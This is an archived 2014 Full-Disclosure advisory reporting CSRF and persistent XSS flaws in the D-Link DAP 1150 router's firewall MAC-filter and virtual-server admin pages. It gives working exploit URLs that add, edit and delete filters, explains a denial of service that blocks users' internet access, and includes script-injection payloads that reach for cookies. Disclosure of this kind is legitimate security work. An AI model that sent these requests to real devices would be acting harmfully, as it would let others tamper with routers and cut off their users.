| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 13 Apr 2014 21:38:10 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
<fulldisclosure@...lists.org>
Subject: [FD] New multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
Hello list!
In 2011 and beginning of 2012 I wrote about multiple vulnerabilities
(http://securityvulns.ru/docs27440.html,
http://securityvulns.ru/docs27677.html,
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens).
That time I wrote about vulnerabilities in admin panel in Access Point mode
and now I'll write about holes in Router mode.
I present new vulnerabilities in this device. There are multiple Cross-Site
Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150
(Wi-Fi Access Point and Router).
SecurityVulns ID: 12076.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This
model with other firmware versions also must be vulnerable. D-Link ignored
all vulnerabilities in this device (as in other devices, which I informed
them about) and still didn't fix them.
----------
Details:
----------
CSRF (WASC-09):
In section Firewall / MAC-filter via CSRF it's possible to add, edit and
delete settings of MAC-filters.
Add:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=-1
Edit:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%221%22,%22enable%22:%22ACCEPT%22}&res_pos=0
Delete:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=74&res_struct_size=0&res_pos=0
DoS attack via CSRF:
By adding appropriate MAC-filters it's possible to block access to Internet
for users via this router. For that it's needed to set MAC-address of user's
device in field mac and set DROP in field enable.
XSS (WASC-08):
These are persistent XSS. The code will execute in section Firewall /
MAC-filter.
Attack via add function in parameter res_buf:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=-1
Attack via edit function in parameter res_buf:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=74&res_struct_size=0&res_buf={%22mac%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%22enable%22:%22ACCEPT%22}&res_pos=0
CSRF (WASC-09):
In section Firewall / Virtual servers via CSRF it's possible to add, edit
and delete settings of virtual servers.
XSS (WASC-08):
These are persistent XSS. The code will execute in section Firewall /
Virtual servers. The attack occurs via add and edit functions in parameter
res_buf.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7103/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists